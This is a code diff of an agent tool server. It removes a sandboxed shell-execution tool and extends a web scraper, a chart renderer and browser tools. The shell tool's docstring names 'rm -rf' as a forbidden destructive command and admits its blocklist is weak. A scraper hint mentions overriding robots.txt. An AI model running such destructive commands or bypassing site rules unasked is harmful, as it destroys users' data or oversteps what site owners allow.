await asyncio.wait_for(job.process.wait(), timeout=grace_seconds)
status = f"terminated cleanly (exit={job.process.returncode})"
except TimeoutError:
try:
job.process.kill()
except ProcessLookupError:
pass
await job.process.wait()
status = f"killed (SIGKILL, exit={job.process.returncode})"
# Deregister after kill so the id is no longer reachable.
async with _jobs_lock:
scope = _jobs.get(agent_id)
if scope is not None:
scope.pop(job_id, None)
return status
async def clear_agent(agent_id: str) -> None:
"""Test hook: kill every job owned by ``agent_id``."""
async with _jobs_lock:
scope = _jobs.pop(agent_id, {})
for job in scope.values():
if job.process.returncode is None:
try:
job.process.kill()
except ProcessLookupError:
pass
await job.process.wait()
@@ -1,222 +0,0 @@
"""Shell command execution tool.
Three tools are registered:
* ``execute_command_tool`` runs a command synchronously with a per-call
timeout (default 120s, max 600s). Uses ``asyncio.create_subprocess_shell``
so the MCP event loop is not blocked while the child runs.
* ``bash_output`` polls a background job started with
``execute_command_tool(run_in_background=True)`` and returns any new
stdout/stderr since the last poll plus the current status.
* ``bash_kill`` terminates a background job (SIGTERM then SIGKILL after
a 3-second grace period).
All three go through the same pre-execution safety blocklist in
``command_sanitizer.py``.
"""
from __future__ import annotations
import asyncio
import os
import time
from mcp.server.fastmcp import FastMCP
from ..command_sanitizer import CommandBlockedError, validate_command
from ..security import AGENT_SANDBOXES_DIR, get_sandboxed_path
from .background_jobs import get as get_job, kill as kill_job, spawn as spawn_job
# Bounds on per-call timeout. 1s minimum prevents accidental zeros that
# would cause every command to fail. 600s maximum (10 min) is the same
# ceiling Claude Code uses for its Bash tool; builds and test suites
# longer than that should use run_in_background instead.
_MIN_TIMEOUT = 1
_MAX_TIMEOUT = 600
_DEFAULT_TIMEOUT = 120
def _resolve_cwd(cwd: str | None, agent_id: str) -> str:
agent_root = os.path.join(AGENT_SANDBOXES_DIR, agent_id, "current")
os.makedirs(agent_root, exist_ok=True)
if cwd:
return get_sandboxed_path(cwd, agent_id)
return agent_root
def register_tools(mcp: FastMCP) -> None:
"""Register command execution tools with the MCP server."""
@mcp.tool()
async def execute_command_tool(
command: str,
agent_id: str,
cwd: str | None = None,
timeout_seconds: int = _DEFAULT_TIMEOUT,
run_in_background: bool = False,
) -> dict:
"""
Purpose
Execute a shell command within the agent sandbox.
When to use
Run validators, linters, builds, test suites
Generate derived artifacts (indexes, summaries)
Perform controlled maintenance tasks
Start long-running processes via ``run_in_background=True``
(dev servers, watchers, file-triggered builds)
Rules & Constraints
No network access unless explicitly allowed
No destructive commands (rm -rf, system modification)
Commands are validated against a safety blocklist before
execution. The blocklist runs through shell=True, so it
only prevents explicit nested shell executables.
timeout_seconds is clamped to [1, 600]. For longer-running
work use run_in_background=True + bash_output to poll.
Args:
command: The shell command to execute.
agent_id: The ID of the agent (auto-injected).
cwd: Working directory for the command (relative to the
agent sandbox). Defaults to the sandbox root.
timeout_seconds: Max wall-clock seconds the foreground
command is allowed to run. Ignored when
run_in_background=True. Default 120, max 600.
run_in_background: If True, spawn the command and return
immediately with a job id. Use bash_output(id=...) to
read output and bash_kill(id=...) to stop it.
Returns:
For foreground commands: dict with stdout, stderr, return_code,
elapsed_seconds.
For background commands: dict with id, pid, started_at, and
instructions for polling / killing the job.
On error: dict with an "error" key.
"""
try:
validate_command(command)
except CommandBlockedError as e:
return {"error": f"Command blocked: {e}", "blocked": True}
try:
secure_cwd = _resolve_cwd(cwd, agent_id)
except Exception as e:
return {"error": f"Failed to resolve cwd: {e}"}
if run_in_background:
try:
job = await spawn_job(command, secure_cwd, agent_id)
except Exception as e:
return {"error": f"Failed to spawn background job: {e}"}
return {
"success": True,
"background": True,
"id": job.id,
"pid": job.process.pid,
"command": command,
"cwd": cwd or ".",
"started_at": job.started_at,
"hint": (
"Background job started. Call "
f"bash_output(id='{job.id}') to read output, or "
f"bash_kill(id='{job.id}') to terminate it."
),
}
# Foreground path: clamp timeout, spawn, wait with a watchdog.
try:
timeout = max(_MIN_TIMEOUT, min(_MAX_TIMEOUT, int(timeout_seconds)))
except (TypeError, ValueError):
timeout = _DEFAULT_TIMEOUT
started = time.monotonic()
try:
proc = await asyncio.create_subprocess_shell(
command,
cwd=secure_cwd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
except Exception as e:
return {"error": f"Failed to execute command: {e}"}
try:
stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=timeout)
except TimeoutError:
# Child is still running: kill it, drain what it already
# wrote so the agent gets a partial log, then report.
try:
proc.kill()
except ProcessLookupError:
pass
try:
stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=2.0)
except (TimeoutError, Exception):
stdout_b, stderr_b = b"", b""
elapsed = round(time.monotonic() - started, 2)
return {
"error": (
f"Command timed out after {timeout} seconds. "
f"For longer work pass timeout_seconds (max 600) or "
f"run_in_background=True."
),
"timed_out": True,
"elapsed_seconds": elapsed,
"stdout": stdout_b.decode("utf-8", errors="replace"),
"stderr": stderr_b.decode("utf-8", errors="replace"),
}
except Exception as e:
return {"error": f"Failed while running command: {e}"}
return {
"success": True,
"command": command,
"return_code": proc.returncode,
"stdout": stdout_b.decode("utf-8", errors="replace"),
"stderr": stderr_b.decode("utf-8", errors="replace"),
"cwd": cwd or ".",
"elapsed_seconds": round(time.monotonic() - started, 2),
}
@mcp.tool()
async def bash_output(id: str, agent_id: str) -> dict:
"""Poll a background command for new output and its current status.
Returns any stdout/stderr bytes written since the last call.
The status is one of "running", "exited(N)", or "killed".
When the job has finished and all output has been consumed, it
is removed from the registry on the next poll.
Args:
id: The job id returned from
execute_command_tool(run_in_background=True).
agent_id: The ID of the agent (auto-injected).
"""
job = await get_job(agent_id, id)
if job is None:
return {"error": f"no background job with id '{id}'"}
new_stdout = job.stdout_buf.read_new()
new_stderr = job.stderr_buf.read_new()
return {
"id": id,
"status": job.status(),
"stdout": new_stdout,
"stderr": new_stderr,
"elapsed_seconds": round(time.time() - job.started_at, 2),
}
@mcp.tool()
async def bash_kill(id: str, agent_id: str) -> dict:
"""Terminate a background command.
Sends SIGTERM, waits up to 3 seconds, then escalates to SIGKILL
if the process is still alive. The job id is then deregistered.
Args:
id: The job id returned from
execute_command_tool(run_in_background=True).
agent_id: The ID of the agent (auto-injected).
"""
status = await kill_job(agent_id, id)
return {"id": id, "status": status}
@@ -10,12 +10,14 @@ Validates URLs against internal network ranges to prevent SSRF attacks.
from __future__ import annotations
import ipaddress
import json
import re
import socket
from typing import Any
from urllib.parse import urljoin, urlparse
from urllib.robotparser import RobotFileParser
from bs4 import BeautifulSoup
from bs4 import BeautifulSoup, NavigableString
from fastmcp import FastMCP
from playwright.async_api import (
Error as PlaywrightError,
@@ -82,6 +84,7 @@ def register_tools(mcp: FastMCP) -> None:
selector: str | None = None,
include_links: bool = False,
max_length: int = 50000,
offset: int = 0,
respect_robots_txt: bool = True,
) -> dict:
"""
@@ -94,12 +97,18 @@ def register_tools(mcp: FastMCP) -> None:
Args:
url: URL of the webpage to scrape
selector: CSS selector to target specific content (e.g., 'article', '.main-content')
include_links: Include extracted links in the response
max_length: Maximum length of extracted text (1000-500000)
include_links: When True, links are inlined as `[text](url)` in
content and also returned as a `links` list
max_length: Maximum length of extracted text returned in this call (1000-500000)
offset: Character offset into the extracted text. Use with
`next_offset` from a prior truncated result to paginate.
respect_robots_txt: Whether to respect robots.txt rules (default True)
Returns:
Dict with scraped content (url, title, description, content, length) or error dict
Dict with: url, final_url, title, description, page_type
(article|listing|page), content, length, offset, total_length,
truncated, next_offset, headings, structured_data (json_ld + open_graph),
and optionally links. On error, returns {"error": str, ...} with a hint when applicable.
"""
try:
# Validate URL
@@ -128,6 +137,7 @@ def register_tools(mcp: FastMCP) -> None:
"error": f"Blocked by robots.txt: {url}",
"url": url,
"skipped": True,
"hint": ("Pass respect_robots_txt=False if you have authorization to scrape this site."),
}
except Exception:
pass # If robots.txt can't be fetched, proceed anyway
@@ -195,7 +205,17 @@ def register_tools(mcp: FastMCP) -> None:
return {"error": "Navigation failed: no response received"}
if response.status != 200:
return {"error": f"HTTP {response.status}: Failed to fetch URL"}
hint = (
"Site likely requires auth, blocks bots, or is rate-limiting."
if response.status in (401, 403, 429)
else "Resource may not exist or server may be down."
)
return {
"error": f"HTTP {response.status}: Failed to fetch URL",
"url": url,
"status": response.status,
"hint": hint,
}
content_type = response.headers.get("content-type", "").lower()
if not any(t in content_type for t in ["text/html", "application/xhtml+xml"]):
@@ -218,63 +238,176 @@ def register_tools(mcp: FastMCP) -> None:
# Parse rendered HTML with BeautifulSoup
soup = BeautifulSoup(html_content, "html.parser")
base_url = str(response.url) # Final URL after redirects
# Extract structured data BEFORE noise removal — JSON-LD lives
# in <script>, which gets decomposed below. JSON-LD is often the
# cleanest source of structured info on listing pages.
json_ld: list[Any] = []
for script in soup.find_all("script", type="application/ld+json"):
raw = script.string or script.get_text() or ""
if raw.strip():
try:
json_ld.append(json.loads(raw))
except (json.JSONDecodeError, TypeError):
pass
open_graph: dict[str, str] = {}
for meta in soup.find_all("meta"):
prop = (meta.get("property") or "").strip()
if prop.startswith("og:"):
val = (meta.get("content") or "").strip()
if val:
open_graph[prop[3:]] = val
# Remove noise elements
for tag in soup(["script", "style", "nav", "footer", "header", "aside", "noscript", "iframe"]):
tag.decompose()
# Get title and description
# Get title and description (fall back to OG description)
title = soup.title.get_text(strip=True) if soup.title else ""
description = ""
meta_desc = soup.find("meta", attrs={"name": "description"})
if meta_desc:
description = meta_desc.get("content", "")
description = meta_desc.get("content", "") or ""
if not description:
description = open_graph.get("description", "")
# Target content
# Headings outline (capped) — lets the agent drill in via selector
headings: list[dict[str, Any]] = []
for h in soup.find_all(["h1", "h2", "h3", "h4", "h5", "h6"]):
h_text = h.get_text(strip=True)
if h_text:
headings.append({"level": int(h.name[1]), "text": h_text})
if len(headings) >= 100:
break
# Page-type heuristic: many <article> blocks → listing page
article_count = len(soup.find_all("article"))
if article_count >= 3:
page_type = "listing"
elif article_count == 1 or soup.find("main"):
page_type = "article"
else:
page_type = "page"
# Locate target subtree
if selector:
content_elem = soup.select_one(selector)
if not content_elem:
return {"error": f"No elements found matching selector: {selector}"}
text = content_elem.get_text(separator=" ", strip=True)
return {
"error": f"No elements found matching selector: {selector}",
"url": url,
"hint": "Try a broader selector or omit selector to use auto-detection.",
}
else:
# Auto-detect main content
main_content = (
soup.find("article")
or soup.find("main")
# Prefer <main> over the first <article> — on listing pages
# the latter would drop every article after the first.
content_elem = (
soup.find("main")
or soup.find(attrs={"role": "main"})
or soup.find("article")
or soup.find(class_=["content", "post", "entry", "article-body"])
or soup.find("body")
)
text = main_content.get_text(separator=" ", strip=True) if main_content else ""
# Clean up whitespace
text = " ".join(text.split())
# Collect link metadata BEFORE rewriting anchors (rewriting
# replaces <a> elements with NavigableStrings, so find_all('a')
# would miss them after).
links: list[dict[str, str]] = []
if content_elem and include_links:
for a in content_elem.find_all("a", href=True)[:50]:
link_text = a.get_text(strip=True)
href = urljoin(base_url, a["href"])
if link_text and href:
links.append({"text": link_text, "href": href})
# Truncate if needed (reserve 3 chars for the ellipsis so the
# final string stays within max_length)
if len(text) > max_length:
text = text[: max_length - 3] + "..."
text = ""
if content_elem:
# Inline anchors as [text](url) so links survive text
# extraction (otherwise the agent has to correlate `links`
# against the text blob).
if include_links:
for a in content_elem.find_all("a", href=True):
link_text = a.get_text(strip=True)
if link_text:
href = urljoin(base_url, a["href"])
a.replace_with(NavigableString(f"[{link_text}]({href})"))
# Convert <br> and block elements into newlines so the output
# preserves paragraph/list/heading structure rather than
# collapsing into one giant whitespace-joined string.
for br in content_elem.find_all("br"):
br.replace_with(NavigableString("\n"))
block_tags = (
"p",
"h1",
"h2",
"h3",
"h4",
"h5",
"h6",
"li",
"tr",
"div",
"section",
"article",
"blockquote",
)
for block in content_elem.find_all(block_tags):
block.insert_before(NavigableString("\n"))
block.append(NavigableString("\n"))
raw_text = content_elem.get_text(separator=" ")
# Normalize: squash spaces within each line, collapse runs of
# blank lines to a single blank, trim.
cleaned: list[str] = []
blank = True # swallow leading blanks
for line in raw_text.split("\n"):
line = re.sub(r"[ \t]+", " ", line).strip()
if line:
cleaned.append(line)
blank = False
elif not blank:
cleaned.append("")
blank = True
text = "\n".join(cleaned).strip()
# Apply offset/truncation with continuation metadata. Reserve 3
# chars for the ellipsis so the returned string stays within
# max_length (back-compat with existing test expectations).
total_length = len(text)
offset = max(0, min(offset, total_length))
end = offset + max_length
truncated = end < total_length
sliced = text[offset:end]
if truncated and len(sliced) >= 3:
sliced = sliced[:-3] + "..."
structured_data: dict[str, Any] = {}
if json_ld:
structured_data["json_ld"] = json_ld
if open_graph:
structured_data["open_graph"] = open_graph
result: dict[str, Any] = {
"url": url,
"final_url": base_url,
"title": title,
"description": description,
"content": text,
"length": len(text),
"page_type": page_type,
"content": sliced,
"length": len(sliced),
"offset": offset,
"total_length": total_length,
"truncated": truncated,
"next_offset": end if truncated else None,
"headings": headings,
}
# Extract links if requested
if structured_data:
result["structured_data"] = structured_data
if include_links:
links: list[dict[str, str]] = []
base_url = str(response.url) # Use final URL after redirects
for a in soup.find_all("a", href=True)[:50]:
href = a["href"]
# Convert relative URLs to absolute URLs
absolute_href = urljoin(base_url, href)
link_text = a.get_text(strip=True)
if link_text and absolute_href:
links.append({"text": link_text, "href": absolute_href})
result["links"] = links
return result
+1 -5
View File
@@ -29,11 +29,7 @@ def register_chart_tools(mcp: FastMCP) -> list[str]:
register_tools(mcp)
return [
name
for name in mcp._tool_manager._tools.keys()
if name.startswith("chart_")
]
return [name for name in mcp._tool_manager._tools.keys() if name.startswith("chart_")]
__all__ = ["register_chart_tools"]
+48 -3
View File
@@ -247,9 +247,7 @@ async def _render_in_page(
# expected to have already coerced JSON-string specs into dicts
# in chart_tools/tools.py — this is a defense-in-depth check.
if isinstance(spec, str):
raise RendererError(
"spec arrived as a string; it should have been parsed to a dict in chart_render"
)
raise RendererError("spec arrived as a string; it should have been parsed to a dict in chart_render")
try:
json.dumps(spec)
except (TypeError, ValueError) as exc:
@@ -273,13 +271,60 @@ async def _render_in_page(
// data points are missing (the 2026-05-01 "all data
// points are gone" bug). We don't need animation in
// a static PNG anyway.
//
// Disjoint-region layout policy. ECharts has no auto-
// layout for component overlap (verified against the
// option reference): title/legend/grid are absolutely
// positioned and ignore each other. We enforce three
// non-overlapping regions:
// - Title: anchored to TOP (top:16, no bottom)
// - Legend: anchored to BOTTOM (bottom:16, no top)
// except when orient:'vertical' (side legend)
// - Grid: middle, with containLabel for axis labels
// Strips user-supplied vertical positions so an agent
// spec like `legend.top:"8%"` (which lands inside the
// title at chat-bubble dimensions the 2026-05-01
// bug) can't collide. Horizontal anchoring (left/right)
// is preserved so e.g. left-aligned legends still work.
// Other fields (text, data, formatter, etc.) win as
// normal via Object.assign middle position.
const userTitle = option.title || {};
const userLegend = option.legend;
const userGrid = option.grid || {};
const legendVertical = userLegend && userLegend.orient === 'vertical';
const stripV = (o) => {
const c = Object.assign({}, o);
delete c.top; delete c.bottom; return c;
};
const sanitized = Object.assign({}, option, {
animation: false,
animationDuration: 0,
animationDurationUpdate: 0,
animationEasing: 'linear',
animationEasingUpdate: 'linear',
title: Object.assign({left: 'center'}, stripV(userTitle), {top: 16}),
grid: Object.assign({left: 56, right: 56}, stripV(userGrid), {
// Force vertical bounds user-supplied grid.top /
// grid.bottom (often percentage strings like "8%"
// that the agent picks at default dimensions) don't
// generalize across chat-bubble sizes. Bottom must
// clear bottom-anchored legend (~36px) plus xAxis
// name (containLabel handles tick labels but NOT
// axis names; that's outerBoundsMode in v6+, we're
// on v5). 96 with legend, 40 without.
top: 64,
bottom: userLegend && !legendVertical ? 96 : 40,
containLabel: true,
}),
});
if (userLegend) {
const legendDefaults = {
icon: 'roundRect', itemWidth: 12, itemHeight: 12, itemGap: 16,
};
sanitized.legend = legendVertical
? Object.assign(legendDefaults, userLegend)
: Object.assign(legendDefaults, stripV(userLegend), {bottom: 16});
}
// Signal "render complete" via window.__chartReady so
// the Python side knows when it's safe to screenshot.
+7 -8
View File
@@ -119,15 +119,15 @@ def build_theme(theme: str = "light") -> dict:
"axisTick": {"show": False},
"axisLabel": {"color": fg_muted, "fontSize": 11, "margin": 14},
"splitLine": {"lineStyle": {"color": grid_line, "type": "dashed"}},
# Y-axis name vertically-centered on the axis instead of
# floating in the upper-left corner where it competes with
# the title and legend.
"nameLocation": "middle",
"nameGap": 44,
"nameTextStyle": {"color": fg_muted, "fontSize": 12, "fontWeight": 500},
"nameRotate": 90,
# Don't auto-rotate value-axis names — the theme can't tell
# xAxis (horizontal-bar) from yAxis (vertical-bar). Rotating
# both at 90° vertical-mounts the xAxis name on horizontal-
# bar charts and it collides with the legend (peer_val
# regression). Specs set nameRotate explicitly when needed.
},
# Same for log/time/etc. — keep the look consistent.
"logAxis": {
"axisLine": {"show": False},
"axisLabel": {"color": fg_muted, "fontSize": 11},
@@ -135,7 +135,6 @@ def build_theme(theme: str = "light") -> dict:
"nameLocation": "middle",
"nameGap": 44,
"nameTextStyle": {"color": fg_muted, "fontSize": 12, "fontWeight": 500},
"nameRotate": 90,
},
"timeAxis": {
"axisLine": {"show": True, "lineStyle": {"color": axis_line}},
@@ -169,8 +168,8 @@ def build_theme(theme: str = "light") -> dict:
# being CSS-hello-world green/red.
"candlestick": {
"itemStyle": {
"color": "#3d7a4a", # up body
"color0": "#a8453d", # down body
"color": "#3d7a4a", # up body
"color0": "#a8453d", # down body
"borderColor": "#3d7a4a",
"borderColor0": "#a8453d",
},
+1 -3
View File
@@ -174,9 +174,7 @@ def register_tools(mcp: FastMCP) -> None:
# browser-side flakes. We retry once for the latter; if
# the second attempt fails too, surface the error so the
# agent can fix it.
logger.warning(
"chart_render attempt %d/%d failed: %s", attempt + 1, 2, exc
)
logger.warning("chart_render attempt %d/%d failed: %s", attempt + 1, 2, exc)
if attempt == 0:
await asyncio.sleep(0.15)
continue
+1 -1
View File
@@ -41,7 +41,7 @@ def register_tools(mcp: FastMCP) -> None:
"""Register all GCU browser tools with the MCP server.
Tools are organized into categories:
- Lifecycle: browser_start, browser_stop, browser_status
- Lifecycle: browser_setup, browser_status, browser_stop (browser_open lazy-creates the context)
- Tabs: browser_tabs, browser_open, browser_close, browser_activate_tab
- Navigation: browser_navigate, browser_go_back, browser_go_forward, browser_reload
- Inspection: browser_screenshot, browser_snapshot, browser_console
+2 -2
View File
@@ -642,7 +642,7 @@ def register_inspection_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_snapshot", params, result=result)
return result
@@ -727,7 +727,7 @@ def register_inspection_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_html", params, result=result)
return result
+11 -11
View File
@@ -153,7 +153,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_click", params, result=result)
return result
@@ -247,7 +247,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_click_coordinate", params, result=result)
return _text_only(result)
@@ -352,7 +352,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_type", params, result=result)
return result
@@ -432,7 +432,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_type_focused", params, result=result)
return result
@@ -506,7 +506,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_press", params, result=result)
return result
@@ -560,7 +560,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_hover", params, result=result)
return result
@@ -627,7 +627,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_hover_coordinate", params, result=result)
return _text_only(result)
@@ -712,7 +712,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_press_at", params, result=result)
return _text_only(result)
@@ -782,7 +782,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_select", params, result=result)
return result
@@ -860,7 +860,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_scroll", params, result=result)
return result
@@ -924,7 +924,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_drag", params, result=result)
return result
+3 -60
View File
@@ -61,7 +61,7 @@ async def _ensure_context(
Lazy-creates the browser context (tab group + seed tab) the first time
a profile is used so URL-taking tools (``browser_open`` /
``browser_navigate``) can be the agent's single cold-start entry
point instead of forcing an explicit ``browser_start`` round trip.
point no separate "start" tool to remember.
Caller must verify ``bridge`` is connected first; any failure in
``bridge.create_context`` propagates so the caller's existing
@@ -137,7 +137,7 @@ def register_lifecycle_tools(mcp: FastMCP) -> None:
return {
"ok": True,
"connected": True,
"status": "Extension is connected and ready. Call browser_start to begin.",
"status": "Extension is connected and ready. Call browser_open(url) to begin.",
}
return {
@@ -150,7 +150,7 @@ def register_lifecycle_tools(mcp: FastMCP) -> None:
"step_3": "Click 'Load unpacked'",
"step_4": f"Select this directory: {ext_path}",
"step_5": ("Click the extension icon in the Chrome toolbar to confirm it says 'Connected'"),
"step_6": "Return here and call browser_start",
"step_6": "Return here and call browser_open(url) to begin",
},
"extensionPath": ext_path,
"extensionPathExists": ext_exists,
@@ -238,63 +238,6 @@ def register_lifecycle_tools(mcp: FastMCP) -> None:
)
return result
@mcp.tool()
async def browser_start(profile: str | None = None) -> dict:
"""
Explicitly create a browser context (tab group) for ``profile``.
Most workflows do NOT need to call this directly: ``browser_open``
and ``browser_navigate`` lazy-create a context on first use, so a
single ``browser_open(url)`` covers the cold path. Reach for
``browser_start`` when you want to (a) warm a profile without
opening a URL yet, or (b) recreate a context after
``browser_stop`` to clear stale state.
No separate browser process is launched uses the user's
existing Chrome via the Beeline extension.
Args:
profile: Browser profile name (default: "default")
Returns:
Dict with start status (``"started"`` on fresh creation,
``"already_running"`` when a context for the profile exists),
including ``groupId`` and ``activeTabId``.
"""
start = time.perf_counter()
params = {"profile": profile}
bridge = get_bridge()
if not bridge or not bridge.is_connected:
result = {
"ok": False,
"error": ("Browser extension not connected. Call browser_setup for installation instructions."),
}
log_tool_call("browser_start", params, result=result)
return result
try:
profile_name, ctx, created = await _ensure_context(bridge, profile)
result = {
"ok": True,
"status": "started" if created else "already_running",
"profile": profile_name,
"groupId": ctx.get("groupId"),
"activeTabId": ctx.get("activeTabId"),
}
log_tool_call(
"browser_start",
params,
result=result,
duration_ms=(time.perf_counter() - start) * 1000,
)
return result
except Exception as e:
logger.exception("Failed to start browser context")
result = {"ok": False, "error": str(e)}
log_tool_call("browser_start", params, error=e, duration_ms=(time.perf_counter() - start) * 1000)
return result
@mcp.tool()
async def browser_stop(profile: str | None = None) -> dict:
"""
+7 -8
View File
@@ -33,11 +33,10 @@ def register_navigation_tools(mcp: FastMCP) -> None:
"""
Navigate a tab to a URL.
Lazy-creates a browser context if none exists (no need to call
``browser_start`` first); when no ``tab_id`` is given and the
context was just created, navigation lands on the seed tab.
Prefer ``browser_open`` when you specifically want a new tab
``browser_navigate`` is for redirecting an existing tab.
Lazy-creates a browser context if none exists; when no ``tab_id``
is given and the context was just created, navigation lands on
the seed tab. Prefer ``browser_open`` when you specifically want
a new tab ``browser_navigate`` is for redirecting an existing tab.
Waits for the page to reach the ``wait_until`` condition before
returning.
@@ -130,7 +129,7 @@ def register_navigation_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_go_back", params, result=result)
return result
@@ -180,7 +179,7 @@ def register_navigation_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_go_forward", params, result=result)
return result
@@ -235,7 +234,7 @@ def register_navigation_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_reload", params, result=result)
return result
+9 -9
View File
@@ -65,7 +65,7 @@ def register_tab_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_tabs", params, result=result)
return result
@@ -100,12 +100,12 @@ def register_tab_tools(mcp: FastMCP) -> None:
"""
Open a browser tab at the given URL preferred entry point.
This is the agent's primary "go to a page" tool. If no browser
context exists yet for the profile, one is created transparently
(no need to call ``browser_start`` first). The first call after
a fresh context reuses the seed ``about:blank`` tab; subsequent
calls open new tabs in the agent's tab group. Waits for the
page to load before returning.
This is the agent's primary "go to a page" tool and the cold-start
entry point if no browser context exists yet for the profile,
one is created transparently. The first call after a fresh
context reuses the seed ``about:blank`` tab; subsequent calls
open new tabs in the agent's tab group. Waits for the page to
load before returning.
Args:
url: URL to navigate to
@@ -192,7 +192,7 @@ def register_tab_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_close", params, result=result)
return result
@@ -271,7 +271,7 @@ def register_tab_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_activate_tab", params, result=result)
return result
@@ -71,17 +71,10 @@ def build_exec_envelope(
# the foundational skill documents). For simplicity we always
# store both when either overflows so the agent can fetch the
# other stream in full too if it wants.
combined = (
b"--- stdout ---\n"
+ stdout_bytes
+ b"\n--- stderr ---\n"
+ stderr_bytes
)
combined = b"--- stdout ---\n" + stdout_bytes + b"\n--- stderr ---\n" + stderr_bytes
output_handle = store.put(combined)
semantic_status, semantic_message = classify(
command, exit_code, timed_out=timed_out, signaled=signaled
)
semantic_status, semantic_message = classify(command, exit_code, timed_out=timed_out, signaled=signaled)
warning = get_warning(command)
+3 -4
View File
@@ -53,9 +53,7 @@ if TYPE_CHECKING:
# directly — the alternative is spawning the first program with the rest
# of the line as junk argv, which either errors or returns fake success
# (e.g. `echo "..." && ps ...` → echo prints the literal command).
_SHELL_METACHARS: frozenset[str] = frozenset(
{"|", "&&", "||", ";", ">", "<", ">>", "<<", "&", "2>", "2>&1", "|&"}
)
_SHELL_METACHARS: frozenset[str] = frozenset({"|", "&&", "||", ";", ">", "<", ">>", "<<", "&", "2>", "2>&1", "|&"})
def register_exec_tools(mcp: FastMCP) -> None:
@@ -126,7 +124,8 @@ def register_exec_tools(mcp: FastMCP) -> None:
return _err_envelope(command, "command was empty")
if any(t in _SHELL_METACHARS for t in tokens) or any(
# globs that shlex left unexpanded (`*`, `?`, `[`)
any(c in t for c in "*?[") and t != "[" for t in tokens
any(c in t for c in "*?[") and t != "["
for t in tokens
):
auto_shell = True
+11 -17
View File
@@ -20,7 +20,6 @@ from gcu.browser.bridge import BeelineBridge
from gcu.browser.tools.advanced import register_advanced_tools
from gcu.browser.tools.inspection import register_inspection_tools
from gcu.browser.tools.interactions import register_interaction_tools
from gcu.browser.tools.lifecycle import register_lifecycle_tools
from gcu.browser.tools.navigation import register_navigation_tools
from gcu.browser.tools.tabs import register_tab_tools
@@ -107,22 +106,17 @@ class TestMultipleSubagentsTabGroups:
